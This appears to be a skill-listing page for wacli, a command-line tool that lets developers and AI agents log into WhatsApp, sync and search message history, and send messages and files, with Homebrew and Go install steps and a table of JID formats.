What is wacli?

wacli is a specialized utility designed for developers and AI agents who need direct, programmatic access to WhatsApp functionality. Unlike standard bot interfaces that handle incoming user messages, this skill enables agents to initiate contact with third parties, manage group communications, and perform deep searches across message archives. By integrating this tool into the suite of Openclaw Skills, you can automate administrative tasks such as sending reminders, dispatching files, or retrieving historical data from specific date ranges.

The tool operates via a local storage system, typically located in your home directory, and provides a bridge between the terminal and the WhatsApp protocol. It is an essential component for high-level automation where an agent needs to act as a communication hub, reaching out to contacts or groups based on complex triggers and logic.

wacli Use Cases

  • Automating outbound notifications and reminders to specific WhatsApp contacts.
  • Retrieving specific transaction details or invoices from past message history using date filters.
  • Synchronizing group chat logs to provide context for data analysis and reporting.
  • Dispatching technical documents, agendas, or media files to stakeholders automatically.
  • Performing bulk searches across multiple chats to identify trends or specific information mentions.

How wacli Works

  1. Authentication is initiated through a QR code login, linking your WhatsApp account to the local CLI environment.
  2. The system utilizes OpenClawProvider as a necessary backend bridge to execute commands on the host machine.
  3. The agent or user issues specific wacli commands to list chats, search messages, or send outbound text and files.
  4. Real-time or batch synchronization ensures the local message database is current for search operations.
  5. Structured JSON output allows the AI agent to parse results and take subsequent actions based on the retrieved data.

wacli Setup

This skill requires the OpenClawProvider to be active on your system. For MacOS, you can install the binary using Homebrew:

brew tap steipete/tap
brew install wacli

Or via Go:

go install github.com/steipete/wacli/cmd/wacli@latest

Once installed, perform the initial authentication and sync:

wacli auth
wacli sync --follow

Verify your installation with the doctor command:

wacli doctor

wacli Data Schema & Taxonomy

The skill manages its local state in the ~/.wacli directory. Data is organized by JIDs (Jabber Identifiers) to distinguish between individual and group contexts within Openclaw Skills.

Data Type Format Description
Individual JID [number]@s.whatsapp.net Unique identifier for private chats
Group JID [id]@g.us Unique identifier for group conversations
Output Format --json Machine-readable structure for agent parsing
Date Filters YYYY-MM-DD ISO format for searching historical message windows

wacli Advanced Features

  • Continuous background synchronization to keep local message stores updated in real-time.
  • Configurable history backfilling to retrieve older messages from the cloud that aren't in the local cache.
  • Detailed search syntax supporting keywords, JID targeting, and specific date boundaries.
  • Direct group messaging support using group-specific JIDs identified via chat listing.
  • Support for multi-media sending including documents and images with custom captions.
